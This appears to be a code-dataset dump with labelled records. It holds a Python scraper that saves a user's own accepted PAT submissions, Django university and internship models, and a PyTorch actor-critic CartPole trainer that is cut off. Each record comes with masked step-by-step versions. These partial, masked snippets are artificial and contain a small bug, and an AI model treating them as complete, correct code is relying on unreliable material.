index += 1
else:
index = 0
index = 0
for answer in answers:
if answer.get('class') != None:
datas[index]['answer'] = answer.get('class')
index += 1
return datas
def anly_data(datas):
linkList = []
for data in datas:
if data['answer'] == [u'submitRes-3']:
link = {
'url':'https://www.patest.cn'+data['link'] + '/source',
'title':data['title']
}
linkList.append(link)
return linkList
def save_file(linkList):
headers = {
'ser-Agent': '',
'Cookie': ''
}
for link in linkList:
request = urllib2.Request(link['url'], headers=headers)
web_data = urllib2.urlopen(request)
soup = BeautifulSoup(web_data, 'html.parser')
code = soup.select('#sourceCode')
file = open(link['title']+'.cpp', 'w')
for i in code:
file.write(i.get_text().encode('utf-8'))
file.close()
if __name__ == '__main__':
datas = []
for page_number in range(1, 12):
url = 'https://www.patest.cn/contests/pat-b-practise/submissions?page={}&self=true'.format(page_number)
datas = get_begin_data(url)
linkList = anly_data(datas)
save_file(linkList)
|
normal
|
{
"blob_id": "790110a8cba960eb19593e816b579080dfc46a4e",
"index": 4572,
"step-1": "<mask token>\n\n\ndef get_begin_data(url):\n headers = {'ser-Agent': '', 'Cookie': ''}\n request = urllib2.Request(url, headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n results = soup.select('table > tr > td > a')\n answers = soup.select('table > tr > td > span')\n index = 0\n datas = []\n for result in results:\n if index == 0:\n data = {'link': result.get('href')}\n index += 1\n elif index == 1:\n data['title'] = result.get_text()\n datas.append(data)\n index += 1\n elif index == 2:\n index += 1\n else:\n index = 0\n index = 0\n for answer in answers:\n if answer.get('class') != None:\n datas[index]['answer'] = answer.get('class')\n index += 1\n return datas\n\n\n<mask token>\n\n\ndef save_file(linkList):\n headers = {'ser-Agent': '', 'Cookie': ''}\n for link in linkList:\n request = urllib2.Request(link['url'], headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n code = soup.select('#sourceCode')\n file = open(link['title'] + '.cpp', 'w')\n for i in code:\n file.write(i.get_text().encode('utf-8'))\n file.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_begin_data(url):\n headers = {'ser-Agent': '', 'Cookie': ''}\n request = urllib2.Request(url, headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n results = soup.select('table > tr > td > a')\n answers = soup.select('table > tr > td > span')\n index = 0\n datas = []\n for result in results:\n if index == 0:\n data = {'link': result.get('href')}\n index += 1\n elif index == 1:\n data['title'] = result.get_text()\n datas.append(data)\n index += 1\n elif index == 2:\n index += 1\n else:\n index = 0\n index = 0\n for answer in answers:\n if answer.get('class') != None:\n datas[index]['answer'] = answer.get('class')\n index += 1\n return datas\n\n\ndef anly_data(datas):\n linkList = []\n for data in datas:\n if data['answer'] == [u'submitRes-3']:\n link = {'url': 'https://www.patest.cn' + data['link'] +\n '/source', 'title': data['title']}\n linkList.append(link)\n return linkList\n\n\ndef save_file(linkList):\n headers = {'ser-Agent': '', 'Cookie': ''}\n for link in linkList:\n request = urllib2.Request(link['url'], headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n code = soup.select('#sourceCode')\n file = open(link['title'] + '.cpp', 'w')\n for i in code:\n file.write(i.get_text().encode('utf-8'))\n file.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_begin_data(url):\n headers = {'ser-Agent': '', 'Cookie': ''}\n request = urllib2.Request(url, headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n results = soup.select('table > tr > td > a')\n answers = soup.select('table > tr > td > span')\n index = 0\n datas = []\n for result in results:\n if index == 0:\n data = {'link': result.get('href')}\n index += 1\n elif index == 1:\n data['title'] = result.get_text()\n datas.append(data)\n index += 1\n elif index == 2:\n index += 1\n else:\n index = 0\n index = 0\n for answer in answers:\n if answer.get('class') != None:\n datas[index]['answer'] = answer.get('class')\n index += 1\n return datas\n\n\ndef anly_data(datas):\n linkList = []\n for data in datas:\n if data['answer'] == [u'submitRes-3']:\n link = {'url': 'https://www.patest.cn' + data['link'] +\n '/source', 'title': data['title']}\n linkList.append(link)\n return linkList\n\n\ndef save_file(linkList):\n headers = {'ser-Agent': '', 'Cookie': ''}\n for link in linkList:\n request = urllib2.Request(link['url'], headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n code = soup.select('#sourceCode')\n file = open(link['title'] + '.cpp', 'w')\n for i in code:\n file.write(i.get_text().encode('utf-8'))\n file.close()\n\n\nif __name__ == '__main__':\n datas = []\n for page_number in range(1, 12):\n url = (\n 'https://www.patest.cn/contests/pat-b-practise/submissions?page={}&self=true'\n .format(page_number))\n datas = get_begin_data(url)\n linkList = anly_data(datas)\n save_file(linkList)\n",
"step-4": "from bs4 import BeautifulSoup\nimport urllib2\n\n\ndef get_begin_data(url):\n headers = {'ser-Agent': '', 'Cookie': ''}\n request = urllib2.Request(url, headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n results = soup.select('table > tr > td > a')\n answers = soup.select('table > tr > td > span')\n index = 0\n datas = []\n for result in results:\n if index == 0:\n data = {'link': result.get('href')}\n index += 1\n elif index == 1:\n data['title'] = result.get_text()\n datas.append(data)\n index += 1\n elif index == 2:\n index += 1\n else:\n index = 0\n index = 0\n for answer in answers:\n if answer.get('class') != None:\n datas[index]['answer'] = answer.get('class')\n index += 1\n return datas\n\n\ndef anly_data(datas):\n linkList = []\n for data in datas:\n if data['answer'] == [u'submitRes-3']:\n link = {'url': 'https://www.patest.cn' + data['link'] +\n '/source', 'title': data['title']}\n linkList.append(link)\n return linkList\n\n\ndef save_file(linkList):\n headers = {'ser-Agent': '', 'Cookie': ''}\n for link in linkList:\n request = urllib2.Request(link['url'], headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n code = soup.select('#sourceCode')\n file = open(link['title'] + '.cpp', 'w')\n for i in code:\n file.write(i.get_text().encode('utf-8'))\n file.close()\n\n\nif __name__ == '__main__':\n datas = []\n for page_number in range(1, 12):\n url = (\n 'https://www.patest.cn/contests/pat-b-practise/submissions?page={}&self=true'\n .format(page_number))\n datas = get_begin_data(url)\n linkList = anly_data(datas)\n save_file(linkList)\n",
"step-5": "from bs4 import BeautifulSoup\r\nimport urllib2\r\ndef get_begin_data(url):\r\n headers = {\r\n 'ser-Agent': '',\r\n 'Cookie': ''\r\n }\r\n request = urllib2.Request(url, headers=headers)\r\n web_data = urllib2.urlopen(request)\r\n soup = BeautifulSoup(web_data, 'html.parser')\r\n results = soup.select('table > tr > td > a')\r\n answers = soup.select('table > tr > td > span')\r\n index = 0\r\n datas = []\r\n for result in results:\r\n if index == 0:\r\n data = {\r\n 'link': result.get('href')\r\n }\r\n index += 1\r\n elif index == 1:\r\n data['title'] = result.get_text()\r\n datas.append(data)\r\n index += 1\r\n elif index == 2:\r\n index += 1\r\n else:\r\n index = 0\r\n index = 0\r\n for answer in answers:\r\n if answer.get('class') != None:\r\n datas[index]['answer'] = answer.get('class')\r\n index += 1\r\n return datas\r\ndef anly_data(datas):\r\n linkList = []\r\n for data in datas:\r\n if data['answer'] == [u'submitRes-3']:\r\n link = {\r\n 'url':'https://www.patest.cn'+data['link'] + '/source',\r\n 'title':data['title']\r\n }\r\n linkList.append(link)\r\n return linkList\r\ndef save_file(linkList):\r\n headers = {\r\n 'ser-Agent': '',\r\n 'Cookie': ''\r\n }\r\n for link in linkList:\r\n request = urllib2.Request(link['url'], headers=headers)\r\n web_data = urllib2.urlopen(request)\r\n soup = BeautifulSoup(web_data, 'html.parser')\r\n code = soup.select('#sourceCode')\r\n file = open(link['title']+'.cpp', 'w')\r\n for i in code:\r\n file.write(i.get_text().encode('utf-8'))\r\n file.close()\r\nif __name__ == '__main__':\r\n datas = []\r\n for page_number in range(1, 12):\r\n url = 'https://www.patest.cn/contests/pat-b-practise/submissions?page={}&self=true'.format(page_number)\r\n datas = get_begin_data(url)\r\n linkList = anly_data(datas)\r\n save_file(linkList)\r\n\r\n\r\n\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from django.db import models
class faculdades(models.Model):
codigo = models.IntegerField(primary_key = True)
nome = models.CharField(max_length=50)
cidade = models.CharField(max_length=30)
estado = models.CharField(max_length=20)
pais = models.CharField(max_length=20)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
class cursos(models.Model):
codigo = models.AutoField(primary_key = True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key = True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key = True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key = True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest', on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % (self.codigo)
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
|
normal
|
{
"blob_id": "20e5220ce23aaaedbfafe599b352f5d3a220e82e",
"index": 6687,
"step-1": "<mask token>\n\n\nclass cursos(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-2": "<mask token>\n\n\nclass faculdades(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-3": "<mask token>\n\n\nclass faculdades(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-4": "from django.db import models\n\n\nclass faculdades(models.Model):\n codigo = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n cidade = models.CharField(max_length=30)\n estado = models.CharField(max_length=20)\n pais = models.CharField(max_length=20)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-5": "from django.db import models\n\nclass faculdades(models.Model):\n codigo = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=50)\n cidade = models.CharField(max_length=30)\n estado = models.CharField(max_length=20)\n pais = models.CharField(max_length=20)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key = True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key = True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models.CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest', on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n \n def __str__(self):\n return '%s' % (self.codigo)\n \n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'",
"step-ids": [
11,
13,
14,
16,
17
]
}
|
[
11,
13,
14,
16,
17
] |
import torch.nn as nn
import torch
from torch.distributions.categorical import Categorical
import torch.nn.functional as F
from torch.optim import Adam
import gym
import numpy as np
Device = torch.device("cuda:0")
class ActorCriticNet(nn.Module):
def __init__(self, observation_space, action_space,
hidden_sizes=[32,32], activation=nn.Tanh):
super().__init__()
obs_dim = observation_space.shape[0]
action_dim = action_space.n
self.base_net = nn.Sequential(
nn.Linear(obs_dim, hidden_sizes[0]),
# nn.Linear(hidden_sizes[0], hidden_sizes[1]),
)
self.pi = nn.Linear(hidden_sizes[1], action_dim)
self.vf = nn.Linear(hidden_sizes[1],1)
self.to(Device)
def forward(self, obs):
obs = torch.Tensor(obs).to(Device)
x = F.relu(self.base_net(obs))
action_logits = F.softmax(self.pi(x), dim=-1)
value = self.vf(x)
return action_logits, value
class Agent(object):
def __init__(self, model=None, lr=1e-2, gamma=0.99):
self.gamma = gamma
self.AC = model
self.optimizer = Adam(AC.parameters(), lr=lr)
self.logp_as = []
self.values = []
self.rewards = []
def choose_action(self, obs):
action_logits, value = self.AC(obs)
distribution = Categorical(action_logits)
action = distribution.sample()
self.logp_as.append(distribution.log_prob(action))
self.values.append(value)
return action.item()
def learn(self):
R = 0
policy_losses = []
value_losses = []
returns = []
for r in self.rewards[::-1]:
R = r + self.gamma * R
returns.insert(0, R)
returns = torch.tensor(returns).to(Device)
returns = (returns - returns.mean()) / (returns.std() + 0.00001)
for logp_a, value, R in zip(self.logp_as, self.values, returns):
advantage = R - value.item()
# calculate actor (policy) loss
policy_losses.append(-logp_a * advantage)
# calculate critic (value) loss using L1 smooth loss
value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).to(Device)))
self.optimizer.zero_grad()
loss = torch.stack(policy_losses).sum() + torch.stack(value_losses).sum()
loss.backward(retain_graph=True)
self.optimizer.step()
self.rewards = []
self.values = []
self.logp_as = []
# Build env
env = gym.make('CartPole-v1')
state = env.reset()
# Learning setting
lr = 3e-2
EPISODES=30000
GAMMA = 0.99
hidden_sizes = [128,128]
show_every = 100
AC = ActorCriticNet(env.observation_space, env.action_space, hidden_sizes)
agent = Agent(AC, lr=lr, gamma=GAMMA)
for episode in range(EPISODES):
# For every episode init
done = False
obs = env.reset()
I = 1
T = 0
# Logs
episode_reward = 0
running_reward = 0
if episode % show_every == 0:
is_render = True
else:
is_render = False
while not done:
# Render
if is_render:
env.render("human")
# Predict action and value
action = agent.choose_action(obs)
# Step the env
next_obs, reward, done, _ = env.step(action)
# Update obs
obs = next_obs
agent.rewards.append(reward)
T += 1
# Logs
episode_reward += reward
# Learn once
agent.learn()
# Update cumulative reward
running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward
print(f"episode_{episode} \t ep_reward = {episode_reward} \t ep_len = {T}")
if running_reward > env.spec.reward_threshold:
print("Solved! Running reward is now {} and "
"the last episode runs to {} time steps!".format(running_reward, T))
break
|
normal
|
{
"blob_id": "e1ab4b034c949b8158c6ccc1e8e3f4a960a38c72",
"index": 4382,
"step-1": "<mask token>\n\n\nclass Agent(object):\n\n def __init__(self, model=None, lr=0.01, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n\n def learn(self):\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 1e-05)\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n policy_losses.append(-logp_a * advantage)\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).\n to(Device)))\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses\n ).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n self.rewards = []\n self.values = []\n self.logp_as = []\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ActorCriticNet(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=[32, \n 32], activation=nn.Tanh):\n super().__init__()\n obs_dim = observation_space.shape[0]\n action_dim = action_space.n\n self.base_net = nn.Sequential(nn.Linear(obs_dim, hidden_sizes[0]))\n self.pi = nn.Linear(hidden_sizes[1], action_dim)\n self.vf = nn.Linear(hidden_sizes[1], 1)\n self.to(Device)\n\n def forward(self, obs):\n obs = torch.Tensor(obs).to(Device)\n x = F.relu(self.base_net(obs))\n action_logits = F.softmax(self.pi(x), dim=-1)\n value = self.vf(x)\n return action_logits, value\n\n\nclass Agent(object):\n\n def __init__(self, model=None, lr=0.01, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n\n def learn(self):\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 1e-05)\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n policy_losses.append(-logp_a * advantage)\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).\n to(Device)))\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses\n ).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n self.rewards = []\n self.values = []\n self.logp_as = []\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ActorCriticNet(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=[32, \n 32], activation=nn.Tanh):\n super().__init__()\n obs_dim = observation_space.shape[0]\n action_dim = action_space.n\n self.base_net = nn.Sequential(nn.Linear(obs_dim, hidden_sizes[0]))\n self.pi = nn.Linear(hidden_sizes[1], action_dim)\n self.vf = nn.Linear(hidden_sizes[1], 1)\n self.to(Device)\n\n def forward(self, obs):\n obs = torch.Tensor(obs).to(Device)\n x = F.relu(self.base_net(obs))\n action_logits = F.softmax(self.pi(x), dim=-1)\n value = self.vf(x)\n return action_logits, value\n\n\nclass Agent(object):\n\n def __init__(self, model=None, lr=0.01, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n\n def learn(self):\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) / (returns.std() + 1e-05)\n for logp_a, value, R in zip(self.logp_as, self.values, returns):\n advantage = R - value.item()\n policy_losses.append(-logp_a * advantage)\n value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).\n to(Device)))\n self.optimizer.zero_grad()\n loss = torch.stack(policy_losses).sum() + torch.stack(value_losses\n ).sum()\n loss.backward(retain_graph=True)\n self.optimizer.step()\n self.rewards = []\n self.values = []\n self.logp_as = []\n\n\n<mask token>\nfor episode in range(EPISODES):\n done = False\n obs = env.reset()\n I = 1\n T = 0\n episode_reward = 0\n running_reward = 0\n if episode % show_every == 0:\n is_render = True\n else:\n is_render = False\n while not done:\n if is_render:\n env.render('human')\n action = agent.choose_action(obs)\n next_obs, reward, done, _ = env.step(action)\n obs = next_obs\n agent.rewards.append(reward)\n T += 1\n episode_reward += reward\n agent.learn()\n running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward\n print(f'episode_{episode} \\t ep_reward = {episode_reward} \\t ep_len = {T}')\n if running_reward > env.spec.reward_threshold:\n print(\n 'Solved! Running reward is now {} and the last episode runs to {} time steps!'\n .format(running_reward, T))\n break\n",
"step-4": "import torch.nn as nn\nimport torch\nfrom torch.distributions.categorical import Categorical\nimport torch.nn.functional as F\nfrom torch.optim import Adam\nimport gym\nimport numpy as np\nDevice = torch.device('cuda:0')\n\n\nclass ActorCriticNet(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=[32, \n 32], activation=nn.Tanh):\n super().__init__()\n obs_dim = observation_space.shape[0]\n action_dim = action_space.n\n self.base_net = nn.Sequential(nn.Linear(obs_dim, hidden_sizes[0]))\n self.pi = nn.Linear(hidden_sizes[1], action_dim)\n self.vf = nn.Linear(hidden_sizes[1], 1)\n self.to(Device)\n\n def forward(self, obs):\n obs = torch.Tensor(obs).to(Device)\n x = F.relu(self.base_net(obs))\n action_logits = F.softmax(self.pi(x), dim=-1)\n value = self.vf(x)\n return action_logits, value\n\n\nclass Agent(object):\n\n def __init__(self, model=None, lr=0.01, gamma=0.99):\n self.gamma = gamma\n self.AC = model\n self.optimizer = Adam(AC.parameters(), lr=lr)\n self.logp_as = []\n self.values = []\n self.rewards = []\n\n def choose_action(self, obs):\n action_logits, value = self.AC(obs)\n distribution = Categorical(action_logits)\n action = distribution.sample()\n self.logp_as.append(distribution.log_prob(action))\n self.values.append(value)\n return action.item()\n\n def learn(self):\n R = 0\n policy_losses = []\n value_losses = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + self.gamma * R\n returns.insert(0, R)\n returns = torch.tensor(returns).to(Device)\n returns = (returns - returns.mean()) 